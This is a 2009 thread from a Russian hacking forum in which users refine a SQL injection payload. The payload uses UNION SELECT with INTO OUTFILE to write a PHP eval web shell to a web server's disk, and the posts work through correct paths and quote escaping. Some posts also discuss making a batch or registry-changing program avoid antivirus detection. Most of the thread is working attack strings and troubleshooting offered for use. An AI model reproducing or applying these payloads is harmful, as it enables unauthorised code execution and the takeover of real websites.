ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.01.2009, 14:04
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от kevmen
http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'
так можно?jokester
Нет, путь нужен полный от корня, или если винда , то с диска. Ты-же на локалке тренируешься? Пробуй лить с такими ../../ путями, и с полными, потом поиском ищи куда залилось, и сам всё поймёшь
|
|
|
25.01.2009, 15:26
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql‘])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'file://localhost/C:/shell.php'
если все верно,шел доступен по адресу
http://localhost/shell.php
Я правильно понимаю?
Запрос Верно составлен?
|
|
|
|
25.01.2009, 15:41
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Нет , Локальный путь, то что ты видишь в проводнике(или что там у тебя), а не в браузере. И доступен он будет там куда ты его положишь.
Тоесть (например для денвера)
http://localhost/ ------- это Z:\home\localhost\www\
Льём
INTO+OUTFILE+'Z:\home\localhost\www\shell.php'
доступен:
http://localhost/shell.php
|
|
|
|
25.01.2009, 15:58
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
l1ght
нет не хочет почему то
|
|
|
|
25.01.2009, 15:58
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789
Репутация:
0
|
|
Сообщение от kevmen
он будет говорить,что это троян!Даже бат он распознает как троя!
А можно объяснить, почему он так будет говорить? Что именно антивирусу не понравится? Я к примеру запускаю бат и не ругается, вношу изменения в реестр и тоже тишина 
|
|
|
|
25.01.2009, 16:06
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Каспер фиксирует даже минимальные изминения в системе,находит прогу,которой вызваны изменения и опредиляет её как вредоносную, иль трояна.
|
|
|
|
25.01.2009, 16:36
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789
Репутация:
0
|
|
Сообщение от -m0rgan-
Каспер фиксирует даже минимальные изминения в системе,находит прогу,которой вызваны изменения и опредиляет её как вредоносную, иль трояна.
ну а как можно сделать чтобы кнопка enter нажималась програмно? если можно поподробней
и чеита у меня на каждое изменение в системе нпомалкивает нод 32??
Последний раз редактировалось Neponomat; 25.01.2009 в 16:39..
|
|
|
|
25.01.2009, 17:48
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2Neponomat а ключ /s не катит?)
|
|
|
|
25.01.2009, 18:04
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET['sql'])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\shell.php'
что-то опять не так делаю,может закодировать?
|
|
|
|
25.01.2009, 18:07
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
kevmen, "<?php eval($_GET['sql'])?>" или '<?php eval($_GET["sql"])?>' или '<?php eval($_GET[sql])?>' и т.д.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
